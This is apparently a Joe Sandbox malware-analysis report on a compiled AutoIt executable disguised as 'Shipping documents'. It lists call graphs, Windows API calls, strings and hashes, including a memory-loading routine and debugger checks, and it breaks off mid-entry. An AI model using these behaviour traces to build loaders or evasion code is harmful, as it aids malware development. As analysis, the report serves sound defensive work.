87890->87892 87893 408f40 VariantClear 87891->87893 87894 45e1cc 87892->87894 87895 45e1db FindClose 87892->87895 87896 45e1a4 87893->87896 87897 45e1d9 moneypunct 87894->87897 87959 44ae3e 87894->87959 87895->87897 87896->87877 87897->87877 87974 475077 87899->87974 87901 4755c0 87901->87877 87903 4678bb 87902->87903 87906 45340c 85 API calls 87903->87906 87935 467954 87903->87935 87904 4115d7 52 API calls 87905 467989 87904->87905 87907 467995 87905->87907 88093 40da60 53 API calls 87905->88093 87908 4678f6 87906->87908 87911 4533eb 85 API calls 87907->87911 87910 413a0e __wsplitpath 46 API calls 87908->87910 87912 4678fc 87910->87912 87913 4679b7 87911->87913 87914 401b10 52 API calls 87912->87914 88078 40de40 87913->88078 87916 46790c 87914->87916 88090 40d200 52 API calls 2 library calls 87916->88090 87921 467917 87921->87935 88091 4339fa GetFileAttributesW FindFirstFileW FindClose 87921->88091 87927 467928 87933 46792f 87927->87933 87927->87935 88092 4335cd 56 API calls 3 library calls 87933->88092 87935->87904 87936 467964 87935->87936 87936->87877 87947 45340c 85 API calls 87946->87947 87948 481438 87947->87948 87949 402880 95 API calls 87948->87949 87950 48143f 87949->87950 87951 481465 87950->87951 87952 40a780 199 API calls 87950->87952 87954 481469 87951->87954 88107 40e710 53 API calls 87951->88107 87952->87951 87954->87877 87955 4814a4 87955->87877 88108 46e785 87956->88108 87958 46e92f 87958->87877 87960 44ae4b moneypunct 87959->87960 87962 443fdf 87959->87962 87960->87897 87967 40da20 87962->87967 87964 443feb 87971 4340db 87964->87971 87966 444001 87966->87960 87968 40da37 87967->87968 87969 40da29 87967->87969 87968->87969 87970 40da3c CloseHandle 87968->87970 87969->87964 87970->87964 87972 40da20 CloseHandle 87971->87972 87973 4340e7 moneypunct 87972->87973 87973->87966 88025 4533eb 87974->88025 87977 4750ee 87980 408f40 VariantClear 87977->87980 87978 475129 88029 4646e0 87978->88029 87984 4750f5 87980->87984 87981 47515e 87982 475162 87981->87982 87992 47518e 87981->87992 87984->87901 88026 453404 88025->88026 88027 4533f8 88025->88027 88026->87977 88026->87978 88027->88026 88072 4531b1 85 API calls 5 library calls 88027->88072 88073 4536f7 53 API calls 88029->88073 88031 4646fc 88074 4426cd 59 API calls _wcslen 88031->88074 88033 464711 88035 40bc70 52 API calls 88033->88035 88041 46474b 88033->88041 88036 46472c 88035->88036 88075 461465 52 API calls _memmove 88036->88075 88038 464741 88039 40c600 52 API calls 88038->88039 88039->88041 88040 464793 88040->87981 88041->88040 88076 463ad5 64 API calls __wcsicoll 88041->88076 88072->88026 88073->88031 88074->88033 88075->88038 88076->88040 88079 40da20 CloseHandle 88078->88079 88080 40de4e 88079->88080 88095 40f110 88080->88095 88083 4264fa 88090->87921 88091->87927 88093->87907 88096 40f125 CreateFileW 88095->88096 88097 42630c 88095->88097 88099 40de74 88096->88099 88098 426311 CreateFileW 88097->88098 88097->88099 88098->88099 88100 426337 88098->88100 88099->88083 88103 40dea0 55 API calls moneypunct 88099->88103 88107->87955 88109 46e7a2 88108->88109 88110 4115d7 52 API calls 88109->88110 88112 46e802 88109->88112 88111 46e7ad 88110->88111 88114 46e7b9 88111->88114 88156 40da60 53 API calls 88111->88156 88113 46e7e5 88112->88113 88121 46e82f 88112->88121 88116 408f40 VariantClear 88113->88116 88117 4533eb 85 API calls 88114->88117 88118 46e7ea 88116->88118 88119 46e7ca 88117->88119 88118->87958 88122 40de40 60 API calls 88119->88122 88120 46e8b5 88149 4680ed 88120->88149 88121->88120 88123 46e845 88121->88123 88124 46e7d7 88122->88124 88127 4533eb 85 API calls 88123->88127 88124->88121 88128 46e7db 88124->88128 88126 46e8bb 88153 443fbe 88126->88153 88136 46e84b 88127->88136 88128->88113 88130 44ae3e CloseHandle 88128->88130 88129 46e87a 88157 4689f4 59 API calls 88129->88157 88130->88113 88133 46e883 88158 4013c0 52 API calls 88133->88158 88136->88129 88136->88133 88137 46e88f 88159 40e0a0 52 API calls 88137->88159 88140 46e899 88160 40d200 52 API calls 2 library calls 88140->88160 88142 46e911 88142->87958 88143 46e8a5 88144 40da20 CloseHandle 88146 46e903 88144->88146 88148 44ae3e CloseHandle 88146->88148 88147 46e881 88147->88142 88147->88144 88148->88142 88150 468100 88149->88150 88151 4680fa 88149->88151 88150->88126 88162 467ac4 55 API calls 2 library calls 88151->88162 88163 443e36 88153->88163 88155 443fd3 88155->88147 88156->88114 88157->88147 88158->88137 88159->88140 88160->88143 88162->88150 88166 443e19 88163->88166 88167 443e26 88166->88167 88168 443e32 WriteFile 88166->88168 88169 443db4 SetFilePointerEx SetFilePointerEx 88167->88169 88168->88155 88169->88168 88170->87717 88171 42d154 88172 42d161 88171->88172 88173 401980 53 API calls 88172->88173 88175 480e67 88172->88175 88173->88172 88193 480b41 88175->88193 88178 481146 88180 408f40 VariantClear 88178->88180 88179 408e80 VariantClear 88179->88193 88182 481156 88180->88182 88181 480ff5 88201 45e737 90 API calls 3 library calls 88181->88201 88183 408f40 VariantClear 88182->88183 88185 48115e 88183->88185 88185->88172 88186 40c2c0 52 API calls 88186->88193 88187 40e710 53 API calls 88187->88193 88188 401980 53 API calls 88188->88193 88190 40a780 199 API calls 88190->88193 88193->88175 88193->88178 88193->88179 88193->88181 88193->88186 88193->88187 88193->88188 88193->88190 88195 40e0a0 52 API calls 88193->88195 88196 45377f 52 API calls 88193->88196 88197 45e951 53 API calls 88193->88197 88198 40e830 53 API calls 88193->88198 88199 47925f 53 API calls 88193->88199 88200 47fcff 199 API calls 88193->88200 88195->88193 88196->88193 88197->88193 88198->88193 88199->88193 88200->88193 88201->88178 88202 3eb55a3 88203 3eb55aa 88202->88203 88204 3eb5648 88203->88204 88205 3eb55b2 88203->88205 88222 3eb5ef8 9 API calls 88204->88222 88209 3eb5258 88205->88209 88208 3eb562f 88210 3eb2c48 GetPEB 88209->88210 88213 3eb52f7 88210->88213 88212 3eb5328 CreateFileW 88212->88213 88219 3eb5335 88212->88219 88214 3eb5351 VirtualAlloc 88213->88214 88213->88219 88220 3eb5458 CloseHandle 88213->88220 88221 3eb5468 VirtualFree 88213->88221 88223 3eb6168 GetPEB 88213->88223 88215 3eb5372 ReadFile 88214->88215 88214->88219 88216 3eb5390 VirtualAlloc 88215->88216 88215->88219 88216->88213 88216->88219 88217 3eb5552 88217->88208 88218 3eb5544 VirtualFree 88218->88217 88219->88217 88219->88218 88220->88213 88221->88213 88222->88208 88224 3eb6192 88223->88224 88224->88212 88225 40b2b9 88228 40ccd0 88225->88228 88227 40b2c4 88268 40cc70 88228->88268 88230 40ccf3 88231 42c3bb 88230->88231 88232 40cd1b 88230->88232 88242 40cd8a moneypunct 88230->88242 88288 45e737 90 API calls 3 library calls 88231->88288 88237 40cd30 88232->88237 88256 40cdad 88232->88256 88234 40cd72 88236 402780 52 API calls 88234->88236 88235 402780 52 API calls 88235->88237 88238 40cd80 88236->88238 88237->88234 88237->88235 88237->88242 88277 40e7d0 336 API calls 88238->88277 88239 40ce40 88278 40ceb0 53 API calls 88239->88278 88242->88227 88243 40ce53 88244 408f40 VariantClear 88243->88244 88245 40ce5b 88244->88245 88247 408f40 VariantClear 88245->88247 88246 42c3a0 88286 45e737 90 API calls 3 library calls 88246->88286 88250 40ce63 88247->88250 88249 42c31a 88279 45e737 90 API calls 3 library calls 88249->88279 88250->88227 88252 42c3ad 88287 452670 VariantClear 88252->88287 88253 40cc70 199 API calls 88253->88256 88254 42c327 88280 452670 VariantClear 88254->88280 88256->88239 88256->88246 88256->88249 88256->88253 88258 42c335 88256->88258 88259 42c370 88256->88259 88263 42c343 88256->88263 88281 452670 VariantClear 88258->88281 88284 45e737 90 API calls 3 library calls 88259->88284 88262 42c392 88285 452670 VariantClear 88262->88285 88282 45e737 90 API calls 3 library calls 88263->88282 88266 42c362 88283 452670 VariantClear 88266->88283 88269 40a780 199 API calls 88268->88269 88270 40cc96 88269->88270 88271 42bd0e 88270->88271 88272 40cc9e 88270->88272 88273 408f40 VariantClear 88271->88273 88275 408f40 VariantClear 88272->88275 88274 42bd16 88273->88274 88274->88230 88276 40ccb8 88275->88276 88276->88230 88277->88242 88278->88243 88279->88254 88280->88242 88281->88242 88282->88266 88283->88242 88284->88262 88285->88242 88286->88252 88287->88242 88288->88242 88289 42b14b 88296 40bc10 88289->88296 88291 42b159 88292 4096a0 336 API calls 88291->88292 88293 42b177 88292->88293 88307 44b92d VariantClear 88293->88307 88295 42bc5b 88297 40bc24 88296->88297 88298 40bc17 88296->88298 88299 40bc2a 88297->88299 88300 40bc3c 88297->88300 88301 408e80 VariantClear 88298->88301 88302 408e80 VariantClear 88299->88302 88303 4115d7 52 API calls 88300->88303 88304 40bc1f 88301->88304 88305 40bc33 88302->88305 88306 40bc43 88303->88306 88304->88291 88305->88291 88306->88291 88307->88295 88308 425b2b 88313 40f000 88308->88313 88312 425b3a 88314 4115d7 52 API calls 88313->88314 88315 40f007 88314->88315 88316 4276ea 88315->88316 88322 40f030 88315->88322 88321 41130a 51 API calls __cinit 88321->88312 88323 40f039 88322->88323 88324 40f01a 88322->88324 88352 41130a 51 API calls __cinit 88323->88352 88326 40e500 88324->88326 88327 40bc70 52 API calls 88326->88327 88328 40e515 GetVersionExW 88327->88328 88329 402160 52 API calls 88328->88329 88330 40e557 88329->88330 88353 40e660 88330->88353 88335 427674 88340 4276c6 GetSystemInfo 88335->88340 88338 40e5e0 88342 4276d5 GetSystemInfo 88338->88342 88367 40efd0 88338->88367 88339 40e5cd GetCurrentProcess 88374 40ef20 LoadLibraryA GetProcAddress 88339->88374 88340->88342 88345 40e629 88371 40ef90 88345->88371 88348 40e641 FreeLibrary 88349 40e644 88348->88349 88350 40e653 FreeLibrary 88349->88350 88351 40e656 88349->88351 88350->88351 88351->88321 88352->88324 88354 40e667 88353->88354 88355 42761d 88354->88355 88356 40c600 52 API calls 88354->88356 88357 40e55c 88356->88357 88358 40e680 88357->88358 88359 40e687 88358->88359 88360 427616 88359->88360 88361 40c600 52 API calls 88359->88361 88362 40e566 88361->88362 88362->88335 88363 40ef60 88362->88363 88364 40e5c8 88363->88364 88365 40ef66 LoadLibraryA 88363->88365 88364->88338 88364->88339 88365->88364 88366 40ef77 GetProcAddress 88365->88366 88366->88364 88368 40e620 88367->88368 88369 40efd6 LoadLibraryA 88367->88369 88368->88340 88368->88345 88369->88368 88370 40efe7 GetProcAddress 88369->88370 88370->88368 88375 40efb0 LoadLibraryA GetProcAddress 88371->88375 88373 40e632 GetNativeSystemInfo 88373->88348 88373->88349 88374->88338 88375->88373 88376 425b5e 88381 40c7f0 88376->88381 88380 425b6d 88416 40db10 52 API calls 88381->88416 88383 40c82a 88417 410ab0 6 API calls 88383->88417 88385 40c86d 88386 40bc70 52 API calls 88385->88386 88387 40c877 88386->88387 88388 40bc70 52 API calls 88387->88388 88389 40c881 88388->88389 88390 40bc70 52 API calls 88389->88390 88391 40c88b 88390->88391 88392 40bc70 52 API calls 88391->88392 88393 40c8d1 88392->88393 88394 40bc70 52 API calls 88393->88394 88395 40c991 88394->88395 88418 40d2c0 52 API calls 88395->88418 88397 40c99b 88419 40d0d0 53 API calls 88397->88419 88399 40c9c1 88400 40bc70 52 API calls 88399->88400 88401 40c9cb 88400->88401 88420 40e310 53 API calls 88401->88420 88403 40ca28 88404 408f40 VariantClear 88403->88404 88405 40ca30 88404->88405 88406 408f40 VariantClear 88405->88406 88407 40ca38 GetStdHandle 88406->88407 88408 429630 88407->88408 88409 40ca87 88407->88409 88408->88409 88410 429639 88408->88410 88415 41130a 51 API calls __cinit 88409->88415 88421 4432c0 57 API calls 88410->88421 88412 429641 88422 44b6ab CreateThread 88412->88422 88414 42964f CloseHandle 88414->88409 88415->88380 88416->88383 88417->88385 88418->88397 88419->88399 88420->88403 88421->88412 88422->88414 88423 44b5cb 58 API calls 88422->88423 88424 425b6f 88429 40dc90 88424->88429 88428 425b7e 88430 40bc70 52 API calls 88429->88430 88431 40dd03 88430->88431 88438 40f210 88431->88438 88433 426a97 88435 40dd96 88435->88433 88436 40ddb7 88435->88436 88441 40dc00 52 API calls 2 library calls 88435->88441 88437 41130a 51 API calls __cinit 88436->88437 88437->88428 88442 40f250 RegOpenKeyExW 88438->88442 88440 40f230 88440->88435 88441->88435 88443 425e17 88442->88443 88444 40f275 RegQueryValueExW 88442->88444 88443->88440 88445 40f2c3 RegCloseKey 88444->88445 88446 40f298 88444->88446 88445->88440 88447 40f2a9 RegCloseKey 88446->88447 88448 425e1d 88446->88448 88447->88440

                                                                                                          Executed Functions

                                                                                                          Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2383988440-0
                                                                                                          • Opcode ID: cab14365d0cfeeb30ca1dc9ea4b8da49c1ba6ce4e0cb3449a27a12e19585523b
                                                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                          • Opcode Fuzzy Hash: cab14365d0cfeeb30ca1dc9ea4b8da49c1ba6ce4e0cb3449a27a12e19585523b
                                                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                          Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Shipping documents..exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                          • String ID: C:\Users\user\Desktop\Shipping documents..exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                          • API String ID: 2495805114-884126049
                                                                                                          • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                          • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                          Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1920->1937 1921->1920 1927 427698-4276a8 1921->1927 1922->1920 1929 427636-427640 1923->1929 1930 42762b-427631 1923->1930 1925 40e5a5-40e5ae 1924->1925 1926 427654-427657 1924->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1920 1934->1920 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                          • String ID: 0SH$#v
                                                                                                          • API String ID: 3363477735-2448020801
                                                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                          Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                                                          • API String ID: 2574300362-3542929980
                                                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                          Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 3403648963-554117064
                                                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                          Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
